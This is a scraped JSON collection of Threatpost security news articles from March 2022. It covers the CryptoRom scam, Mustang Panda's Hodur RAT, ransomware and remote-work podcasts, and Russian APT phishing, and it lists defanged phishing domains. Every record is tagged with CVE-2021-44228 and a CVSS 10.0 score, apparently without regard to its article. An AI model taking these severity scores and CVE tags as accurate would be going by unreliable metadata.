[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T17:46:39", "type": "threatpost", "title": "NVIDIA\u2019s Stolen Code-Signing Certs Used to Sign Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T17:46:39", "id": "THREATPOST:1309DBA0F8A2727965C6FA284A002D3B", "href": "https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T20:53:33", "description": "For about a year now, crypto-traders and lovelorn singles alike have been losing their money to CryptoRom, a malware campaign that combines catfishing with crypto-scamming.\n\nAccording to [research](<https://news.sophos.com/en-us/2022/03/16/cryptorom-bitcoin-swindlers-continue-to-target-vulnerable-iphone-and-android-users/>) from Sophos, CryptoRom\u2019s perpetrators have now improved their techniques. 
They\u2019re leveraging new iOS features \u2013 [TestFlight](<https://developer.apple.com/testflight/>) and [WebClips](<https://support.apple.com/guide/deployment/%22>) \u2013 to get fake apps onto victims\u2019 phones without being subject to the rigorous app store approval process.\n\nSuccessful CryptoRom scams have resulted in five-, six- and even seven-figure losses for victims.\n\n## What is CryptoRom?\n\nWe do silly things when we\u2019re in love. In fact, [scientifically speaking](<https://link.springer.com/article/10.1007/s10508-015-0589-y>), our inhibitions and decision-making capabilities become impaired in the face of romance and sexual arousal.\n\nPerhaps that\u2019s why hackers have been so successful in targeting dating apps over the years. Last year, the Federal Trade Commission [reported](<https://consumer.ftc.gov/articles/what-you-need-know-about-romance-scams#:~:text=Romance%20scams%20reached%20a%20record,%2C%20Facebook%2C%20or%20Google%20Hangouts.>) that \u201cromance scams\u201d cost U.S. citizens over 300 million dollars in 2020, up 50 percent from 2019.\n\nCapitalizing on this trend, last year a new and well-coordinated campaign began targeting users of dating apps like Bumble, Tinder and Grindr. According to a Sophos [report](<https://news.sophos.com/en-us/2021/10/13/cryptorom-fake-ios-cryptocurrency-apps/>) last fall, the attackers\u2019 M.O. 
is to begin there, then move the conversation to messaging apps.\n\n\u201cOnce the victim becomes familiar, they ask them to install fake trading applications with legitimate looking domains and customer support,\u201d researchers explained.\n\nThe trading apps tend to be cryptocurrency-related, since, more so than with fiat currency, cryptocurrency payments are [irreversible](<https://www.uschamber.com/co/run/finance/accepting-cryptocurrency-as-payment#:~:text=Cryptocurrency%20transactions%20are%20irreversible&text=%E2%80%9CTransactions%20can%20be%20refunded%20only,has%20paid%2C%E2%80%9D%20wrote%20Inc.>).\n\n\u201cThey move the conversation to investment and ask them to invest a small amount, and even let them withdraw that money with profit as bait,\u201d according to Sophos. \u201cAfter this, they will be told to buy various financial products or asked to invest in special \u2018profitable\u2019 trading events. The new friend even lends some money into the fake app, to make the victim believe they\u2019re real and caring. When the victim wants their money back or gets suspicious, they get locked out of the account.\u201d\n\nThe ruse can go on quite a while before victims catch on. One anonymous person told Sophos that they lost more than $20,000, while another complained of investing $100,000 into the fake app, while bringing a brother and friends into the scheme unwittingly.\n\nIn the worst case thus far, one user wrote that \u201cI have invested all my retirement money and loan money, about $1,004,000. 
I had no idea that they would freeze my account, requiring me to pay $625,000, which is 20 percent taxes on the total profits before they will unfreeze my account.\u201d\n\nKarl Steinkamp, director at Coalfire, told Threatpost that the scam is a perfect storm of social engineering.\n\n\u201cAn overarching theme here is twofold: One, we are seeing the world\u2019s population rapidly wanting to adopt some format of crypto assets, whether this is Bitcoin, Ethereum or any one of the other 17K+ altcoins,\u201d he said. \u201cAnd two, there is an increasing need for end user (and company) security awareness training when utilizing, storing and transferring any crypto asset. Crypto and digital-asset protection includes different technologies and skills needed to adequately secure the resources.\u201d\n\nHe added, \u201cThe mixing of dating, money / lending, and social-engineering efforts is and will continue to be a potent combination for bad actors to continue to steal money from victims. Bad actors only need to find one crack in the armor, while individuals and companies need to protect against every avenue of threats.\u201d\n\n## What\u2019s New This Time?\n\nA crucial component to the CryptoRom attack flow is those fake apps. Victims might receive a link to download what purports to be BTCBOX, for example, or Binance \u2013 perfectly legitimate cryptocurrency trading platforms. These apps appear to have professional user interfaces, and even come with customer-service chat options.\n\nApple and Google apply strict vetting to weed out malicious mobile apps like these from their official stores. But, as Threatpost has [covered before](<https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/>), hackers have clever tricks to get around conventional security testing. 
In the past, for example, CryptoRom\u2019s preferred method was to use [the Apple Developer Program and Enterprise Signatures](<https://threatpost.com/cryptorom-scammers-apple-enterprise-features/175474/>).\n\nNow, CryptoRom is taking advantage of two new iOS features.\n\nThe first, TestFlight, is a feature developers can use to distribute beta versions of their apps to testers.\n\n\u201cUnfortunately,\u201d wrote the researchers, \u201cjust as we\u2019ve seen happen with other alternative app distribution schemes supported by Apple, \u2018TestFlight Signature\u2019 is available as a hosted service for alternative iOS app deployment, making it all too simple for malware authors to abuse.\u201d\n\nCryptoRom has shifted from Enterprise Signatures towards TestFlight Signatures because, wrote Sophos, \u201cit is a bit cheaper\u201d \u2013 requiring only an .IPA file with a compiled iOS app. Apps also look \u201cmore legitimate when distributed with the Apple Test Flight App,\u201d researchers added. \u201cThe review process is also believed to be less stringent than App Store review.\u201d\n\n\u201cHackers leveraging Apple\u2019s TestFlight platform as a distribution mechanism for malicious apps is a clever \u2014 and relatively simple \u2014 tactic that can certainly lead to problems for victims,\u201d Ray Kelly, fellow at NTT Application Security, told Threatpost. \u201cUsers should understand that side-loading applications is always a precarious proposition. Apps that are downloaded and installed outside of the App Store or Google Play ecosystem have not been vetted for security and privacy risks, leaving the door wide open for attackers to compromise users\u2019 personal data and sometimes, their financial accounts.\u201d\n\nEven more so than TestFlight, CryptoRom attackers have been using WebClips, a feature that allows web links to be added to the iOS home screen like regular apps. 
Malicious WebClips mimic real apps like RobinHood (in the following case, \u201cRobinHand\u201d).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16132308/RobinHand.png>)\n\nA malicious WebClip offering in the Apple App Store. Source: Sophos.\n\n\u201cIn addition to App Store pages, all these fake pages also had linked websites with similar templates to convince users,\u201d the researchers wrote. \u201cThis shows how cheap and easy it is to mimic popular brands while siphoning thousands of dollars from victims.\u201d\n\nSince it\u2019s almost impossible for law enforcement to crack down on any one individual scam, app store providers have a responsibility to monitor for misuse of these developer tools, Mark Lambert, vice president of products at ArmorCode, told Threatpost. He added, \u201cUltimately, however, the problem is a lack of security awareness. It is essential that users look for things that \u2018don\u2019t look right\u2019 and have a fundamental view of not trusting electronic communications or taking them on face value.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. 
_**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T17:32:59", "type": "threatpost", "title": "\u2018CryptoRom\u2019 Crypto Scam is Back via Side-Loaded Apps", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T17:32:59", "id": "THREATPOST:76A072EE53232EB197F119EC2F7EAA74", "href": "https://threatpost.com/cryptorom-crypto-scam-side-loaded-apple-apps/178942/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:33", "description": "The Chinese advanced persistent threat (APT) Mustang Panda (a.k.a. Temp.Hex, HoneyMyte, TA416 or RedDelta) has upgraded its espionage campaign against diplomatic missions, research entities and internet service providers (ISPs) \u2013 largely in and around Southeast Asia.\n\nFor one thing, the APT has deployed a brand-new, customized variant of an old but powerful remote-access tool (RAT) called PlugX (aka Korplug), according to researchers from ESET. 
They named this latest variant \u201cHodur,\u201d after a blind [Norse god](<https://en.wikipedia.org/wiki/H%C3%B6%C3%B0r>) known for slaying his thought-to-be-invulnerable half-brother Baldr.\n\nBeyond that, Mustang Panda has developed a complex array of tactics, techniques and procedures (TTPs) to maximize the efficacy of its attacks.\n\nESET researchers noted, \u201cEvery stage of the deployment process utilizes anti-analysis techniques and control-flow obfuscation.\u201d\n\nThe cyberespionage campaign dates back to at least last August and is still ongoing, according to ESET, and is targeting mainly governments and NGOs. Most victims are located in East and Southeast Asia, but there are outliers in Europe (Greece, Cyprus, Russia) and Africa (South Africa, South Sudan).\n\nThe attacks begin with social-engineering emails or watering-hole attacks, researchers said.\n\n\u201cThe compromise chain includes decoy documents that are frequently updated and relate to events in Europe [and the war in Ukraine],\u201d noted the team, in a [Wednesday posting](<https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/>). \u201cOne of the filenames related to this campaign is \u201cSituation at the EU borders with Ukraine.exe.\u201d\n\nOther phishing lures mention updated COVID-19 travel restrictions, an approved regional aid map for Greece, and a Regulation of the European Parliament and of the Council.\n\n\u201cThe final lure is a real document available on the European Council\u2019s website,\u201d according to ESET. 
\u201cThis shows that the APT group behind this campaign is following current affairs and is able to successfully and swiftly react to them.\u201d\n\n## What is Hodur?\n\nHodur derives [from PlugX](<https://threatpost.com/chinese-spy-group-malware-loaders/145093/#:~:text=PlugX%20was%20first%20identified%20in,the%20infected%20system%3B%20and%20more.>), a RAT that \u201callows remote users to perform data theft or take control of the affected systems without permission or authorization. It can copy, move, rename, execute and delete files; log keystrokes; fingerprint the infected system; and more.\u201d\n\nPlugX is one of the oldest malware families around, having existed in some form or another since 2008, with a rise in popularity in the [mid-2010s](<https://threatpost.com/plugx-go-to-malware-for-targeted-attacks-more-prominent-than-ever/110936/>). Malware that old won\u2019t cut it these days, which is why Mustang Panda has constantly [iterated](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) on it. Even just a few weeks ago, researchers from Proofpoint [discovered](<https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european>) an upgrade \u201cchanging its encoding method and expanding its configuration capabilities.\u201d\n\nAccording to ESET, the new variant \u201cmostly lines up with other Korplug variants, with some additional commands and characteristics.\u201d It for instance closely resembles another Norse-themed variant \u2013 Thor \u2013 [discovered](<https://unit42.paloaltonetworks.com/thor-plugx-variant/>) in 2020.\n\n## Sophisticated Attack Chain\n\nHodur itself is hardly the star of the show: Mustang Panda\u2019s campaign features literally dozens of TTPs designed to establish persistence, collect data and evade defenses.\n\nAs mentioned, the campaign begins simply, as the group uses current events to phish their targets. 
For example, last month, Proofpoint discovered it puppeteering a NATO diplomat\u2019s email address to send out .ZIP and .EXE files titled \u201cSituation at the EU borders with Ukraine.\u201d\n\nIf a target falls for the bait, a legitimate, validly signed, executable vulnerable to DLL search-order hijacking, a malicious DLL, and an encrypted Hodur file are deployed on the target machine.\n\n\u201cThe executable is abused to load the module, which then decrypts and executes the\u2026RAT,\u201d explained researchers. \u201cIn some cases, a downloader is used first to deploy these files along with a decoy document.\u201d\n\nMustang Panda\u2019s campaigns then frequently use custom loaders for shared malware including Cobalt Strike, Poison Ivy, and now, Hodur. Then things get interesting. ESET analysts tallied a total of 44 MITRE ATT&CK techniques deployed in this campaign. Most interesting are the 13 different methods of obfuscating or otherwise evading cybersecurity tools and detection.\n\nFor example, the ESET blog noted that \u201cdirectories created during the installation process are set as hidden system directories,\u201d and \u201cfile and directory names match expected values for the legitimate app that is abused by the loader.\u201d\n\nAnd, the malware gaslights you because \u201cscheduled tasks created for persistence use legitimate-looking names,\u201d and \u201cwhen writing to a file, Korplug sets the file\u2019s timestamps to their previous values.\u201d\n\n## **Who\u2019s Behind Mustang Panda?**\n\nCybersecurity analysts have been tracking Mustang Panda [since 2017](<https://malpedia.caad.fkie.fraunhofer.de/actor/mustang_panda>), when they first started using Mongolian-themed phishing tactics to conduct espionage on targets in Southeast Asia. Still, there\u2019s much we don\u2019t know about the group.\n\nThe depth and complexity of their TTPs puts Mustang Panda more in the company of state-sponsored groups than criminal ones. 
So \u201cit is possible, though unproven, that they are state-sponsored or at least state-sanctioned,\u201d wrote Mike Parkin, senior technical engineer at Vulcan Cyber, via email.\n\nHistorically, the group has kept to Southeast Asia, with one notable exception \u2013 [the Vatican](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) \u2013 in 2020. The vast majority of targets in ongoing campaigns have, indeed, been located in Mongolia and Vietnam, followed closely by Myanmar. However, as mentioned, the list also includes select entities in Europe and Africa, which muddies the picture a bit.\n\n\u201cThe target distribution is interesting,\u201d Parkin concluded. \u201cThere isn\u2019t enough information publicly available here to determine the attacker\u2019s ultimate agenda.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T14:08:06", "type": "threatpost", "title": "Chinese APT Combines Fresh Hodur RAT with Complex Anti-Detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T14:08:06", "id": "THREATPOST:77DB31E826E03EA9D78EE4777986EA49", "href": "https://threatpost.com/chinese-apt-combines-fresh-hodur-rat-with-complex-anti-detection/179084/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-10T14:12:32", "description": "You hate to blame the victim, but the fact of the matter is that businesses are just asking to get whacked with ransomware multiple times.\n\nA recent [study](<https://www.extrahop.com/company/press-releases/2022/cyber-confidence-index-2022/>) of IT leaders from cloud-native network detection and response firm ExtraHop shows that businesses aren\u2019t even aware of the \u201cattack me,\u201d \u201ceasy prey\u201d pheromones they\u2019re giving off: In fact, there\u2019s a yawning chasm between perception and reality.\n\nThe study shows that corporate leaders have a false sense of security when it comes to their organizations\u2019 IT security readiness. Their confidence is disconnected from their admittance that their cybersecurity incidents are a result of their own outdated IT security plans, including widespread use of insecure and deprecated protocols, as well as growing numbers of unmanaged devices.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThe reality: 69 percent of respondents acknowledged transmitting sensitive data over unencrypted HTTP connections instead of more secure HTTPS connections. 
Another 68 percent are still running SMBv1, the protocol exploited in major/ancient/still-exploited attacks like [WannaCry](<https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/>) and [NotPetya](<https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/>), leading to more than $1 billion in damages worldwide.\n\nDenial ain\u2019t just a river in Egypt. The delusion is particularly dangerous, given the sky-high rate of ransomware attacks. In ExtraHop\u2019s Cyber Confidence Index 2022 \u2013 which surveyed 500 security and IT decision makers in the United States, United Kingdom, France and Germany \u2013 85 percent reported having suffered at least one ransomware attack, and 74 percent reported experiencing multiple incidents in the past five years.\n\n * A jarring majority have experienced a ransomware attack, with some being hit twice. What\u2019s more, the data shows that if a business is hit once, it\u2019s more likely to be hit again.\n * A number of IT decision makers haven\u2019t faced an attack \u2013 and so they \u201caren\u2019t concerned.\u201d\n * 77 percent of IT decision makers are very or extremely confident in their company\u2019s ability to prevent or mitigate cybersecurity threats. And yet \u2026\n * 64 percent admit that half or more of their cybersecurity incidents are the result of their own outdated IT security postures.\n * 85 percent reported having suffered at least one ransomware attack in the past five years, and 74 percent have experienced multiple attacks.\n * 48 percent of companies that suffered a ransomware attack said they paid the ransom demanded most or all of the time.\n\nJamie Moles, ExtraHop senior technical manager, dropped by the Threatpost podcast to talk about perceptions vs. reality.\n\nWannaCry, which hit a few years ago, is a prime example, he told us. The advice back then (and now) was that organizations should check their backups to make sure they\u2019re usable. 
Innumerable articles and blogs interrogated admins, asking, Have you actually restored a backup recently to make sure that your restores work? Are they up to date?\n\n\u201cA lot of people, we\u2019re finding, actually, that their backup procedures were good, but maybe the technology wasn\u2019t up to date or they were too reliant on things like [volume shadow copies](<https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service>) on workstations,\u201d Jamie told us. \u201cA restore when data was corrupted, not realizing that ransomware gangs turn off volume shadow copies on workstations.\n\n\u201cSo you can\u2019t restore from that. And a lot of organizations found that maybe their backups weren\u2019t fully up to date and they had to go too far back in time to restore, to get themselves operationally back to date. And this has an obvious impact in terms of operating. Resilience has a cost factor associated with it, and getting yourself back to where you were yesterday.\u201d\n\nSo\u2026not to imply anything, but hey, we just thought we\u2019d ask: Have you checked your backups lately to make sure they work?\n\nIf not, maybe go do that. We\u2019ll wait. This podcast doesn\u2019t have an expiration date.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030722_ExtraHop_Jamie_Moles_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T14:00:32", "type": "threatpost", "title": "Multi-Ransomwared Victims Have It Coming\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T14:00:32", "id": "THREATPOST:02A472487653A461080415A3F7BB23D2", "href": "https://threatpost.com/blaming-ransomware-victims-podcast/178799/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T14:20:55", "description": "The baby upchucks. The dog loudly informs you that she\u2019s detected a budding squirrel armageddon. Your department\u2019s Zoom meeting starts in four minutes. The Bank of Fezziwig texts: If you haven\u2019t enabled online banking, click here.\n\nWhat. Do. You. DO?!?\n\nIt doesn\u2019t matter that you\u2019ve been working remotely since circa P.P. \u2013 that\u2019s Pre-Pandemic times. 
Now, your spouse is underfoot, your kids are bouncing off the walls of your quote-unquote office, you haven\u2019t had coffee, and you\u2019re pretty sure you don\u2019t even have an account at B of F, so you better just click that link and get the thing off your phone and out of your face.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nWrong answer! You\u2019ve been [smished](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>) by an attacker who sent a malicious link via SMS.\n\nTwo years into the pandemic, remote work has become common, but securing data is just as tough as it\u2019s always been. You don\u2019t have to look far to see tales of human error leading to cyber malfeasance: The human factor is at the base of most cyberattacks, from the employees who [fall for](<https://threatpost.com/bec-losses-top-18b/167148/>) business email compromise (BEC) attacks to whoever forgot to shut down that no-longer-used [VPN account](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>) that attackers used to launch the calamitous [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) ransomware attack.\n\nMark Loveless is a staff security researcher at GitLab, maker of the web-based Git repository. He\u2019s an expert at securing data when you\u2019ve got a remote, oftentimes frantically distracted workforce. 
After all, as GitLab [puts it](<https://about.gitlab.com/company/culture/all-remote/guide/>), it\u2019s \u201cone of the world\u2019s largest all-remote companies,\u201d with over 1,500 team members located in more than 65 countries around the world.\n\nMark visited the Threatpost podcast to give us an update on the world of remote work and to answer this question: Where are we now with data protection?\n\nCaution: If you\u2019re playing a drinking game based on how many times he\u2019ll say \u201c[Zero Trust](<https://threatpost.com/practical-guide-zero-trust-security/151912/>),\u201d stock the liquor cabinet before listening. Mark also cautioned that the dog might see a squirrel during our interview. It happens.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/022522_Mark_Loveless_GitLab_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T14:00:53", "type": "threatpost", "title": "Securing Data With a Frenzied Remote Workforce\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T14:00:53", "id": "THREATPOST:EC28F82F6C3ECD5D0BA7471D5BA50FD6", "href": "https://threatpost.com/securing-data-frenzied-remote-workforce-podcast/178742/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T15:37:46", "description": "While Russia is fighting a physical war on the ground against Ukraine, advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government are ramping up phishing and other attacks against Ukrainian and European targets in cyberspace, Google is warning.\n\nResearchers from Google\u2019s Threat Analysis Group (TAG) have seen an increase in activity ranging \u201cfrom espionage to phishing campaigns\u201d from threat groups known as FancyBear/APT28 and 
Ghostwriter/UNC1151, Shane Huntley, director of software engineering at Google TAG, wrote in a [blog post](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) published Monday. The former has been attributed to Russia\u2019s GRU intelligence agency, and the latter is an actor that Ukraine previously said is part of the Belarusian Ministry of Defense.\n\nMeanwhile, there has been a recent spate of distributed denial-of-service (DDoS) attacks against Ukrainian government sites, such as the Ministry of Foreign Affairs and the Ministry of Internal Affairs, as well as key services that help Ukrainians find information, such as Liveuamap, according to Google TAG.\n\nChina\u2019s Mustang Panda also has joined the fray, using the war in Ukraine to target European entities with lures related to the Ukrainian invasion in a recent phishing campaign. China\u2019s government is one of the few around the world backing Putin in the conflict.\n\n\u201cWe\u2019re sharing this information to help raise awareness among the security community and high risk users,\u201d Huntley wrote in the post.\n\n## **Phishing Flurry**\n\nFancy Bear, the APT behind attacks against the [2020 Tokyo Olympics](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) and [elections in the European Union](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>), most recently has been targeting users of ukr.net \u2013 owned by the Ukrainian media company URKNet \u2013 with \u201cseveral large credential phishing campaigns,\u201d Huntley wrote.\n\n\u201cThe phishing emails are sent from a large number of compromised accounts (non-Gmail/Google), and include links to attacker controlled domains,\u201d according to the post.\n\nIn two recent campaigns, TAG saw attackers using newly created Blogspot domains as the initial landing page, which then redirected targets to credential phishing pages. 
At this time, all known attacker-controlled Blogspot domains have been taken down, Huntley added.\n\nMeanwhile, Ghostwriter has conducted similarly motivated phishing campaigns over the past week against Polish and Ukrainian government and military organizations, according to Google TAG. The group also has been targeting webmail users from the following providers in the region: i.ua, meta.ua, rambler.ru, ukr.net, wp.pl and yandex.ru.\n\nGoogle TAG blocked a number of credential phishing domains that researchers observed during the campaigns through Google Safe Browsing, according to the post. Those domains included the following: accounts[.]secure-ua[.]website, i[.]ua-passport[.]top, login[.]creditals-email[.]space, post[.]mil-gov[.]space and verify[.]rambler-profile[.]site.\n\n## **Capitalizing on Conflict**\n\nNot to be outdone, China\u2019s Mustang Panda, aka Temp.Hex**,** HoneyMyte, TA416 or RedDelta, is using phishing lures related to the conflict in the Ukraine to target European organizations.\n\n\u201cTAG identified malicious attachments with file names such as [\u2018Situation at the EU borders with Ukraine.zip\u2019](<https://www.virustotal.com/gui/file/8a7fbafe9f3395272548e5aadeb1af07baeb65d7859e7a1560f580455d7b1fac/>) which contain an executable of the same name that is a basic downloader,\u201d Huntley explained in the post. 
When executed, the file downloads several additional files that install the final, malicious payload, according to TAG.\n\nWhile Huntley noted that targeting Europe represents a shift for the threat actor \u2013 which typically targets entities in Southeast Asia \u2013 Mustang Panda has been active against EU entities before, most notably targeting Rome\u2019s Vatican and Catholic Church-related organizations with [a spearphishing campaign](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) in September 2020.\n\nTo mitigate the APT\u2019s latest phishing attacks, TAG has alerted relevant authorities of its findings, Huntley noted.\n\n## **Expanding DDoS Protection**\n\nAs APTs step up phishing attacks against Ukrainian targets, key government and service-oriented websites in the country also are facing a new barrage of DDoS attacks, as mentioned.\n\nAs these attacks are likely to continue, Google has expanded eligibility for [Project Shield](<https://projectshield.withgoogle.com/landing>), the company\u2019s free protection against DDoS attacks, to \u201cUkrainian government websites, embassies worldwide and other governments in close proximity to the conflict,\u201d Huntley wrote. More than 150 websites in Ukraine, including many news organizations, are currently using the service.\n\nProject Shield allows Google to absorb the bad traffic in a DDoS attack so the targeted organization can continue operating and defend against these attacks, according to the post. The company is recommending that eligible organizations [register](<https://support.projectshield.withgoogle.com/s/?language=en_US>) for Project Shield in the wake of increased DDoS attack activity, Huntley wrote.\n\n\n
